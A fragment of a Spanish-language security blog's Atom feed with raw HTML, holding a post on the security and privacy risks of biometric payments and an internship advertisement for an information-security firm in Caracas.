&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbD-h9AGnSPLgQTp0sdHIK0ifp2Tqyrs44Q5fxLlUQ0rnBMkAAwTlMjmEODZO8ByacW4vS3mwc1G1-_QSLv1eDv7Nza0_ZeGhkDgu-gBS4MZwA2AC1ySr91KogdyrN_JDBioEOAesI_xY/s1600/1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;450&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbD-h9AGnSPLgQTp0sdHIK0ifp2Tqyrs44Q5fxLlUQ0rnBMkAAwTlMjmEODZO8ByacW4vS3mwc1G1-_QSLv1eDv7Nza0_ZeGhkDgu-gBS4MZwA2AC1ySr91KogdyrN_JDBioEOAesI_xY/s640/1.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmVB1lWM1gp8K8C61JxZi_VVC_sqUamTJHlOpRkANY4dHjF5-2wWpPLQ0fJQSDbEcJ62q1JkUwsvIz16rITB8xwF65abfj_5vFlxJtQTnZoIwE77uXpVmYwuv6vT8yWyjXeMSLwTSic0o/s1600/2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;470&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmVB1lWM1gp8K8C61JxZi_VVC_sqUamTJHlOpRkANY4dHjF5-2wWpPLQ0fJQSDbEcJ62q1JkUwsvIz16rITB8xwF65abfj_5vFlxJtQTnZoIwE77uXpVmYwuv6vT8yWyjXeMSLwTSic0o/s640/2.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/6733464166826650787/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2016/11/jornadas-de-investigacion-ing-ucv-14-al.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/6733464166826650787'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/6733464166826650787'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2016/11/jornadas-de-investigacion-ing-ucv-14-al.html' title='Jornadas de Investigación Ing. UCV - 14 al 18 de Nov.'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzzwCzq70QTBcRDuCMQPTgwoUx1gBxUuoHs2Pe077Q_9Rz3D8mcYz8NDZXqN5-EftFSGxoN0l7e9-rvrdMo-qreY4cY4wiF9wJdgAPmEscxYVR1oIjj70UVkC99oNMsIJpCGVJENkJXWk/s72-c/jifi-2016.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-7430373129524281381</id><published>2016-08-12T16:38:00.000-04:00</published><updated>2016-08-12T16:39:36.772-04:00</updated><title type='text'>Biometría, ¿el futuro de los pagos seguros?</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNLLNQda_DN_itpB9FibTnsD0zBKBjDEn8WYGuUFY7ksmwDMo4_fk4AptrkVOg3MkZveAgPWezvpTfS-6P8hSh1z0nIgfDhWbFDhlfAAYQ-UCOOKPb2vanTjRyCQUB7VGLf_bxW2ASOYI/s1600/biometria-craneo.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;310&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNLLNQda_DN_itpB9FibTnsD0zBKBjDEn8WYGuUFY7ksmwDMo4_fk4AptrkVOg3MkZveAgPWezvpTfS-6P8hSh1z0nIgfDhWbFDhlfAAYQ-UCOOKPb2vanTjRyCQUB7VGLf_bxW2ASOYI/s640/biometria-craneo.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;A pesar de la comodidad y la sencillez de la seguridad biométrica, por no mencionar los millones que podría ahorrarle a los bancos al evitar los fraudes online, los profesionales de seguridad informática plantearon varias preocupaciones en torno a la seguridad y la privacidad de los pagos biométricos.&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Una de las principales preocupaciones es que la medición biométrica se está utilizado como equivalente a una contraseña o clave de acceso, en lugar de usarse como una prueba de identidad que luego se complemente con una contraseña o PIN para autenticar dicha información. Esto plantea la preocupación de que el límite entre la delincuencia física y la de la información comience a desdibujarse, y algunos especulan que la biometría podría abrir las puertas a espantosos ataques dirigidos.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Esto no es una exageración. Hace algunos años, el criptógrafo japonés Tsutomu Matsumoto se hizo famoso por engañar los sistemas de seguridad de huellas dactilares utilizando un “dedo de goma”copiado directamente desde el dedo objetivo.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
También se descubrieron algunas fallas en la tecnología biométrica de pago móvil. En septiembre, unos investigadores revelaron que era posible engañar la tecnología TouchID de Apple usando huellas digitales falsas y también se hizo una prueba de concepto similar con el escáner de huellas digitales del Galaxy S5 de Samsung. Mientras tanto, algunos usuarios se quejaron de los elevados índices de reconocimiento erróneo y muchos se preguntaron si efectivamente era posible copiar una huella desde una fotografía.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Si a esto le sumamos la posibilidad de que roben los datos biométricos y el peligro subsecuente del robo de identidad, queda claro que los pagos seguros biométricos aún tienen un largo camino por recorrer. Sin embargo, prácticamente no cabe duda de que esta tecnología (y la idea de poder “conectarse uno mismo” en esta era de la Internet de las Cosas) llegó para quedarse. Esperamos que estés preparado.&lt;/div&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/7430373129524281381/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2016/08/skullconduct-el-futuro-de-los-pagos.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/7430373129524281381'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/7430373129524281381'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2016/08/skullconduct-el-futuro-de-los-pagos.html' title='Biometría, ¿el futuro de los pagos seguros?'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNLLNQda_DN_itpB9FibTnsD0zBKBjDEn8WYGuUFY7ksmwDMo4_fk4AptrkVOg3MkZveAgPWezvpTfS-6P8hSh1z0nIgfDhWbFDhlfAAYQ-UCOOKPb2vanTjRyCQUB7VGLf_bxW2ASOYI/s72-c/biometria-craneo.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-4072668172531414660</id><published>2016-08-12T16:22:00.003-04:00</published><updated>2016-08-12T16:26:49.573-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Empleo"/><category scheme="http://www.blogger.com/atom/ns#" term="Vídeo"/><title type='text'>Pasantías en Seguridad de la Información en Caracas - Venezuela</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixOGXzRtRW7E8wvVAVX4PPihof7u6pzMVfPnFdvrY8GVdo_KMZsjsu_qlic15FCVEqoZTmJhBiVlcoJt_cRnSAt7NvnTcPFpdOHviay76hyIFanoYIiGKCpPm5mq-kjhCxdhkFeqisKCI/s1600/banner_oferta_pasantia_gr-620x279.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;288&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixOGXzRtRW7E8wvVAVX4PPihof7u6pzMVfPnFdvrY8GVdo_KMZsjsu_qlic15FCVEqoZTmJhBiVlcoJt_cRnSAt7NvnTcPFpdOHviay76hyIFanoYIiGKCpPm5mq-kjhCxdhkFeqisKCI/s640/banner_oferta_pasantia_gr-620x279.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;¿Necesitas hacer tus pasantías de pregrado?&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;¿Te gustaría tener tu primer empleo y ganar experiencia?&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;¿Te gusta el área de la Seguridad de la Información?&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;¿Te gustaría aprender de las herramientas y metodologías aplicadas en seguridad más avanzadas de la actualidad?&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: Calibri, sans-serif; margin: 0cm 0cm 0.0001pt; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: Calibri, sans-serif; margin: 0cm 0cm 0.0001pt; text-align: justify;&quot;&gt;
&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Si dos o tres respuestas son positivas, entonces te esperamos en nuestra empresa especializada en Seguridad de la información, Seguridad Informática y Seguridad Electrónica, tenemos plazas para 6 pasantes en&amp;nbsp;&lt;a data-saferedirecturl=&quot;https://www.google.com/url?hl=es&amp;amp;q=https://www.intelicorps.com/&amp;amp;source=gmail&amp;amp;ust=1471116534229000&amp;amp;usg=AFQjCNG3jFoqn2dxbricew82wTa8St9lWg&quot; href=&quot;https://www.intelicorps.com/&quot; style=&quot;color: #1155cc;&quot; target=&quot;_blank&quot;&gt;InteliCorp&lt;/a&gt;&amp;nbsp;en Caracas - Venezuela.&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: Calibri, sans-serif; margin: 0cm 0cm 0.0001pt; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: Calibri, sans-serif; margin: 0cm 0cm 0.0001pt; text-align: justify;&quot;&gt;
&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Envía tu síntesis curricular al correo&amp;nbsp;&lt;a href=&quot;mailto:rrhh@intelicorps.com&quot; style=&quot;color: #1155cc;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;rrhh@intelicorps.com&lt;/span&gt;&lt;/a&gt;&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: Calibri, sans-serif; margin: 0cm 0cm 0.0001pt; text-align: justify;&quot;&gt;
&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;/u&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif; font-size: large; text-align: left;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: Calibri, sans-serif; margin: 0cm 0cm 0.0001pt;&quot;&gt;
&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Requisitos:&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black;&quot;&gt;-&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-stretch: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;Ser puntual,&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black;&quot;&gt;-&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-stretch: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;Ser ordenad@,&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black;&quot;&gt;-&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-stretch: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;Tener orientación al logro&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black;&quot;&gt;-&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-stretch: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;Motivación&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black;&quot;&gt;-&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-stretch: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;Ser eficiente&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black;&quot;&gt;-&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-stretch: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;Ser eficaz&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black;&quot;&gt;-&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-stretch: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;Cumplimiento de objetivos&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black;&quot;&gt;-&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-stretch: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;Centrad@s&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black;&quot;&gt;-&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-stretch: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;Capacidad de planificación&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black;&quot;&gt;-&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-stretch: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;Tener propósitos de vida&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black;&quot;&gt;-&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-stretch: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;Tener capacidad de adaptación&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #222222; font-family: arial, sans-serif;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black;&quot;&gt;-&lt;span style=&quot;font-family: &amp;quot;times new roman&amp;quot;; font-stretch: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;u&gt;&lt;/u&gt;&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;Tener capacidad de hacer varias tareas&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: Calibri, sans-serif; margin: 0cm 0cm 0.0001pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: Calibri, sans-serif; margin: 0cm 0cm 0.0001pt; text-align: justify;&quot;&gt;
&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;No todos son necesarios, pero si no los tienes, aquí te los enseñamos para que tu futuro sea mejor.&lt;u&gt;&lt;/u&gt;&lt;u&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: Calibri, sans-serif; margin: 0cm 0cm 0.0001pt; text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: Calibri, sans-serif; margin: 0cm 0cm 0.0001pt;&quot;&gt;
&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Disciplina del éxito&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: Calibri, sans-serif; margin: 0cm 0cm 0.0001pt;&quot;&gt;
&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;iframe allowfullscreen=&quot;&quot; class=&quot;YOUTUBE-iframe-video&quot; data-thumbnail-src=&quot;https://i.ytimg.com/vi/OmxXZWz7AY4/0.jpg&quot; frameborder=&quot;0&quot; height=&quot;266&quot; src=&quot;https://www.youtube.com/embed/OmxXZWz7AY4?feature=player_embedded&quot; width=&quot;320&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; color: #222222; font-family: Calibri, sans-serif; margin: 0cm 0cm 0.0001pt;&quot;&gt;
&lt;span style=&quot;color: black; font-family: &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
